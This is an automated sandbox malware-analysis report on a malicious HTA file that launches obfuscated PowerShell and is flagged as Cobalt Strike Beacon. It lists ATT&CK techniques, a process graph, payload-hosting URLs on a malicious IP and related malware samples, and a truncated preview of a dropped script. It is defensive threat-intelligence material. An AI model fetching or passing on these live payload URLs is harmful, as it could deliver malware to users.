        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting        		Valid Accounts12
        Command and Scripting Interpreter        		111
        Scripting        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts4
        PowerShell        		Logon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials13
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541928 Sample: seethebestthingstobegoodwit... Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 46 drive.usercontent.google.com 2->46 48 drive.google.com 2->48 50 2 other IPs or domains 2->50 64 Suricata IDS alerts for network traffic 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 12 other signatures 2->70 10 mshta.exe 1 2->10         started        signatures3 process4 signatures5 72 Detected Cobalt Strike Beacon 10->72 74 Suspicious powershell command line found 10->74 76 PowerShell case anomaly found 10->76 13 powershell.exe 3 39 10->13         started        process6 dnsIp7 52 192.3.176.141, 49730, 80 AS-COLOCROSSINGUS United States 13->52 40 goodthingswithgrea...ckwithgreatthig.vbS, Unicode 13->40 dropped 42 C:\Users\user\AppData\...\wasjhvt4.cmdline, Unicode 13->42 dropped 84 Detected Cobalt Strike Beacon 13->84 86 Suspicious powershell command line found 13->86 88 Obfuscated command line found 13->88 90 Found suspicious powershell code related to unpacking or dynamic code loading 13->90 18 wscript.exe 1 13->18         started        21 powershell.exe 21 13->21         started        23 csc.exe 3 13->23         started        26 conhost.exe 13->26         started        file8 signatures9 process10 file11 54 Detected Cobalt Strike Beacon 18->54 56 Suspicious powershell command line found 18->56 58 Wscript starts Powershell (via cmd or directly) 18->58 62 3 other signatures 18->62 28 powershell.exe 7 18->28         started        60 Loading BitLocker PowerShell Module 21->60 38 C:\Users\user\AppData\Local\...\wasjhvt4.dll, PE32 23->38 dropped 31 cvtres.exe 1 23->31         started        signatures12 process13 signatures14 78 Detected Cobalt Strike Beacon 28->78 80 Suspicious powershell command line found 28->80 82 Obfuscated command line found 28->82 33 powershell.exe 15 15 28->33         started        36 conhost.exe 28->36         started        process15 dnsIp16 44 drive.google.com 216.58.206.78, 443, 49731 GOOGLEUS United States 33->44

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        seethebestthingstobegoodwithhislifebestthigns.hta33%ReversingLabsScript-WScript.Trojan.Asthma

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.microsoft.0%URL Reputationsafe
        http://go.micros0%URL Reputationsafe
        https://aka.ms/pscore6lB0%URL Reputationsafe
        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		216.58.206.78
        		truefalse
          		unknown
          drive.usercontent.google.com
          		142.250.186.129
          		truefalse
            		unknown
            198.187.3.20.in-addr.arpa
            		unknown
            		unknownfalse
              		unknown
              50.23.12.20.in-addr.arpa
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFCpowershell.exe, 00000001.00000002.2003720720.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1998227914.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1866713912.00000000061AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://drive.usercontent.google.compowershell.exe, 0000000B.00000002.1988384568.0000000004B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://go.micropowershell.exe, 00000001.00000002.1985218848.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.0000000004D26000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.microsoft.powershell.exe, 00000001.00000002.2003720720.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.microYpowershell.exe, 00000001.00000002.2003720720.0000000007581000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://go.microspowershell.exe, 00000003.00000002.1864429563.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://drive.gopowershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://drive.google.com/ucpowershell.exe, 00000007.00000002.2021283699.0000000003127000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                http://www.microsoft.K5powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1985218848.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1864429563.0000000005141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2024894876.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2024894876.00000000051F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1998227914.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1866713912.00000000061AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://drive.google.compowershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://drive.usercontent.google.compowershell.exe, 0000000B.00000002.1988384568.000000000491C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1985218848.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1864429563.0000000005141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2024894876.00000000051D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      192.3.176.141
                                      		unknownUnited States
                                      		36352AS-COLOCROSSINGUStrue
                                      216.58.206.78
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1541928
                                      Start date and time:2024-10-25 10:32:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 59s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:seethebestthingstobegoodwithhislifebestthigns.hta
                                      Detection:MAL
                                      Classification:mal100.expl.evad.winHTA@17/19@4/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 43
                                      • Number of non-executed functions: 12
                                      Cookbook Comments:
                                      • Found application associated with file extension: .hta
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target mshta.exe, PID 5260 because there are no executed function
                                      • Execution Graph export aborted for target powershell.exe, PID 4432 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 6852 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7408 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7592 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: seethebestthingstobegoodwithhislifebestthigns.hta

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      04:33:13API Interceptor90x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      192.3.176.141nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
                                      SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                      • 192.3.176.141/35/SMLPERR.txt
                                      Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                      • 192.3.176.141/36/LOGS%20LOKI.txt
                                      Logs.xlsGet hashmaliciousLokibotBrowse
                                      • 192.3.176.141/43/LCRDDFR.txt
                                      logicalwayofgreatthingswhichcreatedwithgreatwayofgood.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
                                      greatwayforbestthignswithwhonotwanttodo.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
                                      PPM435679.xlsGet hashmaliciousUnknownBrowse
                                      • 192.3.176.141/551/cw/nicevisionnicemagicalthinsforentirelifetogetmebackwithgreat.hta
                                      Purchase order.xlsGet hashmaliciousUnknownBrowse
                                      • 192.3.176.141/550/cw/fullofconfidentwithgreatnicethingswedonewithgreatattitude.hta
                                      Payment Advice080.xlsGet hashmaliciousUnknownBrowse
                                      • 192.3.176.141/456/cs/verynicesweetgirlsareeverywheretogetmein.hta
                                      Purchase order.xlsGet hashmaliciousUnknownBrowse
                                      • 192.3.176.141/455/ed/createnewthingswithmygrilstobeinline.hta

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      drive.usercontent.google.comnicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 142.250.186.97
                                      SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                      • 172.217.16.193
                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 142.250.186.97
                                      Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 142.250.185.193
                                      Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 216.58.206.65
                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 142.250.185.193
                                      transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 142.250.186.97
                                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                      • 216.58.212.129
                                      Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 142.250.186.97
                                      EL-25-536_40005512_Le Cuivre_23102024.vbeGet hashmaliciousGuLoaderBrowse
                                      • 142.250.186.97

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AS-COLOCROSSINGUSla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                      • 107.174.214.206
                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                      • 172.245.19.71
                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                      • 104.168.36.51
                                      Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 192.3.179.174
                                      Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                      • 23.94.171.157
                                      Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 192.3.179.174
                                      nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 192.3.176.141
                                      Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                      • 23.94.171.157
                                      Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 192.3.179.174
                                      Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                      • 23.94.171.157

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://klickskydd.skolverket.org/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3DA2C259BD24DEB977%25211517%26authkey%3D%2521AMV6sdjMIZf95vs%26page%3DView%26wd%3Dtarget%2528Quick%2520Notes.one%257C8266a05f-045a-4cc0-bddc-4debc90069bb%252FNotera%2520H6TYD9J4rDFDFECZC-HUYW%257Ca949d04d-b4e2-4509-b99f-d04546199b7b%252F%2529%26wdorigin%3DNavigationUrl&id=71de&rcpt=johan.brandt@skolverket.se&tss=1729830791&msgid=2d0ccdeb-928a-11ef-8a2e-0050569b0508&html=1&h=008c08c0Get hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0Get hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                      • 216.58.206.78
                                      Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 216.58.206.78
                                      Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 216.58.206.78
                                      copia de pago____xls.exeGet hashmaliciousDarkCloudBrowse
                                      • 216.58.206.78
                                      Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 216.58.206.78
                                      runtime.exeGet hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      runtime.exeGet hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                      • 216.58.206.78

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\goodthingswithgreatcomebackwithgreatthigns[1].tiff

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):139890
                                      Entropy (8bit):3.6923510936476616
                                      Encrypted:false
                                      SSDEEP:3072:vybNgt5pdGwoO4TxQQYQt2Cwvo6buGauOmM:0DNlYTdvo6TauOx
                                      MD5:52A69AB69D1C871566791A3C06982607
                                      SHA1:367845C8B76D602680EE6069F3BDE95E02C350D9
                                      SHA-256:4F6090A3D6A848AE3EF2310CACA02976FE8448FC21CBE357F4A28A88F34EAD28
                                      SHA-512:681B60151EF27726F8B4C9C0949A8962FA8B16FE3583BA5EE4019831B6AC2AD5BF2562DA0E8FC55CDEC4CB10C59A608896B9BE98BEDD1A8BBDE43B711EE2E0C2
                                      Malicious:false
                                      Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.a.m.b.r.e.i.r.o.)..... . . . .d.i.m. .a.p.o.u.c.a.d.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .a.p.o.u.c.a.d.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .a.p.o.u.c.a.d.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . .

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
